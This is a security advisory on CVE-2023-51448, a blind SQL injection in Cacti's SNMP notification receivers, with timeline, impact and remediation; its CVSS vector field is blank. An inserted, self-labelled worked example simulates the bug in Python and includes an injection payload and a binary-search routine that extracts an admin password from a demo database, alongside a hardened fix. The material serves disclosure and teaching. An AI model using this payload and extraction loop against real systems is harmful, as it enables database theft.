CyRC Vulnerability Advisory: CVE-2023-51448 Blind SQL Injection in SNMP Notification Receivers

Matthew Hogg

Jan 08, 2024

CVE-2023-51448 overview

The Synopsys Cybersecurity Research Center (CyRC) has discovered CVE-2023-51448, a blind SQL injection (SQLi) vulnerability in Cacti.

Cacti is a performance and fault management framework written in PHP. It uses a variety of data collection methods to populate an RRDTool-based time series database (TSDB) with performance data, and offers a web user interface to view this performance data in graphs. Cacti is easily extensible for custom needs via its plugin system.

The ‘selected_graphs_array’ parameter is deserialized, and the elements of the result are concatenated into a raw SQL query without sufficient sanitization, so a crafted payload triggers SQLi. Using a blind SQLi technique, an attacker can disclose Cacti database contents or trigger remote code execution (RCE).


CVE-2023-51448 exploitation

An attacker authenticated with any account that possesses the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint ‘/managers.php’ with an SQLi payload in the ‘selected_graphs_array’ HTTP GET parameter to trigger the vulnerability.
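The two passages above (the deserialized list concatenated into a raw query, and the crafted ‘selected_graphs_array’ request that abuses it) as an added worked example. This is not Cacti's code and not part of the advisory: Python with SQLite stands in for Cacti's PHP and MySQL, JSON stands in for PHP's serialize()/unserialize(), and the `notifications` and `user_auth` tables, the `manager_id` column and the secret value are constructed for the demonstration. The vulnerable handler keeps the shape of the bug, the oracle shows why the injection is blind (the only signal is whether a row comes back), and the hardened handler shows the fix pattern of rejecting non-integer ids and parameterizing the query.

```python
"""Added illustration of the bug class behind CVE-2023-51448 (not Cacti's code).

Assumptions: Python + SQLite stand in for Cacti's PHP + MySQL, JSON stands in for
PHP serialize()/unserialize(), and the schema below is constructed for the demo.
"""
import json
import sqlite3


def make_db():
    """Constructed sample database: a notification-receiver table plus a table
    holding a secret the attacker wants to read (think of a password column)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE notifications(id INTEGER PRIMARY KEY, manager_id INTEGER, name TEXT);
        INSERT INTO notifications VALUES (1, 7, 'linkDown'), (2, 7, 'linkUp'), (3, 9, 'coldStart');
        CREATE TABLE user_auth(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO user_auth VALUES (1, 'admin', 's3cr3t');
    """)
    return con


def vulnerable_handler(con, manager_id, selected_graphs_array):
    """Vulnerable shape: the deserialized value is only checked to be a list, then
    each element is concatenated verbatim into the IN (...) clause of a raw query."""
    items = json.loads(selected_graphs_array)          # the "deserialization" step
    if not isinstance(items, list):
        return []
    sql = ("SELECT id FROM notifications WHERE manager_id = %d AND id IN (%s) ORDER BY id"
           % (manager_id, ",".join(str(i) for i in items)))
    return [row[0] for row in con.execute(sql)]


def hardened_handler(con, manager_id, selected_graphs_array):
    """Hardened shape: every element must be an integer id (bool is rejected too,
    since it is an int subclass in Python) and the query is parameterized."""
    items = json.loads(selected_graphs_array)
    if not isinstance(items, list) or not all(
            isinstance(i, int) and not isinstance(i, bool) for i in items):
        raise ValueError("selected_graphs_array must be a list of integer ids")
    placeholders = ",".join("?" * len(items))
    sql = ("SELECT id FROM notifications WHERE manager_id = ? AND id IN (%s) ORDER BY id"
           % placeholders)
    return [row[0] for row in con.execute(sql, [manager_id, *items])]


def make_oracle(con):
    """Boolean oracle: the page returns row 1 when the injected condition is
    true and nothing when it is false. The payload closes the IN (...) list,
    appends the condition and comments out the rest of the query."""
    def oracle(condition):
        payload = json.dumps(["1) AND (" + condition + ") -- "])
        return vulnerable_handler(con, 7, payload) == [1]
    return oracle


def blind_extract(oracle, max_len=32):
    """Boolean-based blind extraction of the admin password, one character per
    position, binary-searching the ASCII code point with 7 queries per character."""
    secret = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = ("(SELECT unicode(substr(password, %d, 1)) FROM user_auth "
                    "WHERE username = 'admin') > %d" % (pos, mid))
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # past the end: unicode('') is NULL, every test is false
            break
        secret += chr(lo)
    return secret


def demo():
    con = make_db()
    leaked = blind_extract(make_oracle(con))
    legit = hardened_handler(con, 7, json.dumps([1, 2, 3]))
    try:
        hardened_handler(con, 7, json.dumps(["1) AND 1=1 -- "]))
        blocked = False
    except ValueError:
        blocked = True
    return leaked, legit, blocked


if __name__ == "__main__":
    print(demo())   # ('s3cr3t', [1, 2], True)
```

The oracle is deliberately the whole signal an attacker gets from a blind SQLi: no error text, no data echoed, just "row present" versus "row absent". Binary search over the code point keeps the request count at seven per character, which is why a blind bug is enough to dump a database at scale. Note that the hardened handler rejects a digit string such as `"1"`; whether to coerce or reject is a policy choice, but either way nothing from the deserialized value should reach the SQL text, and the ids should also be checked against what the authenticated account may actually act on.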

Affected software

Cacti version 1.2.25

Impact

Exploitation of this vulnerability would allow an attacker to disclose the entire contents of the Cacti database. It may also be escalated to RCE, as demonstrated with CVE-2023-49084.

CVSS Base Score: 8.3

CVSS 3.1 Vector:

CVE-2023-51448 remediation

The vulnerability is patched as of the fix commit of December 20, 2023 (see Patch under References).

CVE-2023-51448 discovery credit

This vulnerability was discovered by CyRC researcher Matthew Hogg.

Vulnerability discovery timeline

2023-09-18 – Vulnerability discovered.

2023-09-21 – Vendor notified.

2023-10-06 – Vendor accepted report.

2023-12-20 – Vulnerability published, and vendor fix released.

References

Patch

CVE-2023-51448

CVE-2023-49084

About CVSS

FIRST.Org, Inc (FIRST) is a non-profit organization based in the US that owns and manages CVSS. Membership in FIRST is not required to use or implement CVSS, but FIRST does require that any individual or organization give appropriate attribution when using CVSS. FIRST also states that any individual or organization that publishes scores should follow its guidelines so that anyone can understand how the score was calculated.
